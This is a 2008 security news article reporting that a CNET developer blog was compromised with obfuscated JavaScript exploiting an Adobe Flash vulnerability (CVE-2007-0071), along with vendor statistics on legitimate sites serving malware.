CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts
August 8th, 2008

Malicious Javascript Code In Another CNET Networks Website

Websense has discovered that another CNET Networks site, CNET Clientside Developer Blog, has been compromised, just 5 months after previous incident. The main page of this website contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host. This malicious JavaScript code attempts to access the live exploit URL from a .info domain that is now down.

The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction.

The Clientside developer blog which has been embedded with a malicious JavaScript code attempting to exploit the visitors through a well known vulnerability in Adobe Flash’s player. Software vulnerable to this attack includes Adobe Flash Player version 9.0.115.0 and previous, Adobe Flex 3.0, Adobe AIR 1.0.

This malware attack is not as an isolated event. Lately, the attack where legitimate sites are starting to serve malware and exploits became very popular. Multiple vendors are confirming this trend: in its latest report, ScanSafe found 407 percent increase in compromise of legitimate websites, according to Sophos 79 percent of malware-hosting Web sites are legitimate ones, according to Websense more than 75 percent of the Web sites classified as malicious were actually legitimate ones. Those studies show that the old security advise “stay away from unknown websites” would soon become irrelevant.

Share this item with others:

More on CyberInsecure:
  • Software Offered By CNET Bundled With Trojans, Spread Through Download.com
  • UK Government Website Hacked And Infected
  • CNET Sites Under IFRAME Attack
  • Asprox Botnet Mass Attack Hits Governmental, Healthcare, and Top Business Websites
  • JavaScript Bug Patched By Mozilla In Firefox 2.0.0.14

    • Posted in Malware, Mass Web Attacks, Vulnerabilities | Print This Post Print This Post

    This entry was posted on Friday, August 8th, 2008 at 3:14 am and is filed under Malware, Mass Web Attacks, Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

    If you found this information useful, consider linking to it from your own website.
    Just copy and paste the code below into your website (Ctrl+C to copy)
    It will look like this: Malicious Javascript Code In Another CNET Networks Website

    Leave a Reply

    Comments with unsolicited links to other resources will be marked as spam. DO NOT leave links in comments. Please leave your real email, it wont be published.

    *
    To prove you’re a person (not a spam script), type the security word shown in the picture. Click on the picture to hear an audio file of the word.

    « «
    » »